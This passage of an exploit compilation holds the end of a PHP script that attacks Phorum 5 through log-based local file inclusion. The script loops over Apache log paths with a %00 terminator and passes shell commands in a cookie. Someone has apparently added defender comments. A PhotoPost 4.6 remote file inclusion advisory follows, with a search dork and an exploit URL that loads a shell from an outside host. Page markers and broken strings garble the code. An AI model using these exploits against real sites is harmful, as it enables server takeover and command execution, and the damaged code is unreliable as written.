$packet.="User-Agent: ".$CODE."\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: close\r\n\r\n";
#debug
#echo quick_dump($packet);
sendpacketii($packet);
# Candidate web-server log locations; the loop further down places each entry
# (URL-encoded, followed by %00) into the GLOBALS[template] parameter of pm.php.
# NOTE(review): the strings in this copy appear damaged by document extraction
# (runs of spaces and slashes), so they should be read as a list of which log
# files are probed rather than as literal values.
# Defender note: every entry is an Apache-style access or error log. A request
# parameter that names one of these files, especially with a trailing %00, is a
# strong indicator of a log-based local file inclusion attempt and is worth
# alerting on in WAF or access-log monitoring.
$paths= array (
" / / / / / / / / / /var/log/httpd/access_log",
" / / / / / / / / / /var/log/httpd/error_log",
" /apache/logs/error.log",
" /apache/logs/access.log",
" / /apache/logs/error.log",
" / /apache/logs/access.log",
" / / /apache/logs/error.log",
" / / /apache/logs/access.log",
" / / / /apache/logs/error.log",
" / / / /apache/logs/access.log",
" / / / / /apache/logs/error.log",
" / / / / /apache/logs/access.log",
# NOTE(review): "Trang 2" on the next line looks like a page marker carried over
# from the source document, not PHP; the array does not parse as printed.
Trang 2" /logs/error.log",
" /logs/access.log",
" / /logs/error.log",
" / /logs/access.log",
" / / /logs/error.log",
" / / /logs/access.log",
" / / / /logs/error.log",
" / / / /logs/access.log",
" / / / / /logs/error.log",
" / / / / /logs/access.log",
" / / / / / / / / / /etc/httpd/logs/acces_log",
" / / / / / / / / / /etc/httpd/logs/acces.log",
" / / / / / / / / / /etc/httpd/logs/error_log",
" / / / / / / / / / /etc/httpd/logs/error.log",
" / / / / / / / / / /var/www/logs/access_log",
" / / / / / / / / / /var/www/logs/access.log",
" / / / / / / / / / /usr/local/apache/logs/access_log",
" / / / / / / / / / /usr/local/apache/logs/access.log",
" / / / / / / / / / /var/log/apache/access_log",
" / / / / / / / / / /var/log/apache/access.log",
# NOTE(review): "Trang 3" on the next line is the same kind of page marker.
Trang 3" / / / / / / / / / /var/log/access_log",
" / / / / / / / / / /var/www/logs/error_log",
" / / / / / / / / / /var/www/logs/error.log",
" / / / / / / / / / /usr/local/apache/logs/error_log",
" / / / / / / / / / /usr/local/apache/logs/error.log",
" / / / / / / / / / /var/log/apache/error_log",
" / / / / / / / / / /var/log/apache/error.log",
" / / / / / / / / / /var/log/access_log",
" / / / / / / / / / /var/log/error_log"
);
# Walks the $paths list: for each entry it requests pm.php with
# GLOBALS[template] set to the URL-encoded entry plus %00, then looks for the
# marker string "phorum_xpl" in $html.
# $p, $host, $cookie, $cmd, $html and sendpacketii() are defined outside this
# excerpt; presumably sendpacketii() fills $html with the response. TODO confirm
#
# Defender notes:
# - The request only works if the application lets a request parameter overwrite
#   GLOBALS[template] and then uses that value as an include path. Template names
#   should come from a fixed allow-list, never from request data.
# - The trailing %00 relies on the runtime cutting the path at a NUL byte; PHP
#   rejects file paths containing NUL bytes from 5.3.4 onward.
# - Useful detection signals visible here: "GLOBALS[" in a query string, "%00"
#   at the end of a parameter value, and log-file names in a parameter.
for ($i=0; $i<=count($paths)-1; $i++)
{
# Progress counter shown to the operator, offset by 3; presumably earlier steps
# outside this excerpt use the lower numbers.
$a=$i+3;
echo "[".$a."] trying with $paths[$i]%00 for template argument\r\n";
# NOTE(review): the string literal below is split across two lines in this copy,
# which puts a line break right after "GET"; this looks like an extraction
# artifact rather than the author's intent.
$packet="GET
".$p."pm.php?1,page=1&GLOBALS[template]=".urlencode($paths[$i])."%00 HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
# The Cookie header carries $cookie plus a cmd=... value taken from $cmd.
$packet.="Cookie: ".$cookie." cmd=".$cmd.";\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
# NOTE(review): "Trang 4" on the next line looks like a page marker from the
# source document, not PHP.
Trang 4if (strstr($html,"phorum_xpl"))
{
echo "exploit succeeded \n\n";
# Print only what follows the first marker in the response, then stop.
$temp=explode("phorum_xpl",$html);
echo $temp[1]; die;
}
}
// Reached only when no entry produced the marker: the success branch above ends
// the script with die.
echo "exploit failed ";
?>
original url: http://retrogod.altervista.org/phorum5_local_incl_xpl.html
vns3curity(HCE)
#PhotoPost => 4.6 (PP_PATH) Remote File Inclusion Exploit
#=================================================
===================
#PhotoPost => 4.6 (PP_PATH) Remote File Inclusion Exploit
#=================================================
===================
#
#Critical Level : Dangerous
#
#By Saudi Hackrz
#
#http://www.popphoto.com/
#
#=================================================
================
#
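#Script Name: PhotoPost 4.6 & 4.5 & 4.x 4.0
#Fix : update to 4.7 or 4.8. Inclusion of a remote URL through a request-supplied variable typically also depends on PHP settings such as register_globals and allow_url_fopen / allow_url_include being enabled, so keeping those off reduces exposure on hosts that cannot upgrade immediately.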
#Script
#http://www.9q9q.net/up3/index.php?f=UyTfHCHIg
#
#=================================================
================
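#Bug in : zipndownload.php
# require "$PP_PATH/languages/$pplang/showgallery.php";
# require "$PP_PATH/login-inc.php";
#
#Both require statements are in zipndownload.php and build the include path from $PP_PATH. The request shown below sets PP_PATH in the query string, so the script apparently does not assign a fixed value to that variable before the require runs.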
#Dork :in Yahoo -: "Powered by: PhotoPost PHP 4.6" or "Powered by: PhotoPost PHP 4.5"
#=================================================
================
#
#Exploit :
# -
#
#http://site.com/[path]/zipndownload.php?PP_PATH=http://SHELLURL.COM?
#
#=================================I LOVE SAUDI ARABIA=============================================
#Discovered by : Saudi Hackrz
#
#Contact : Saudi.unix[at]hotmail.com
#
#GreetZ : SnIpEr_Sa , King18 , LeCoPrA and all my friends
#www.S3hr.com , http://www.elite-team.cc/vb , www.3asfh.net ,www.xp10.com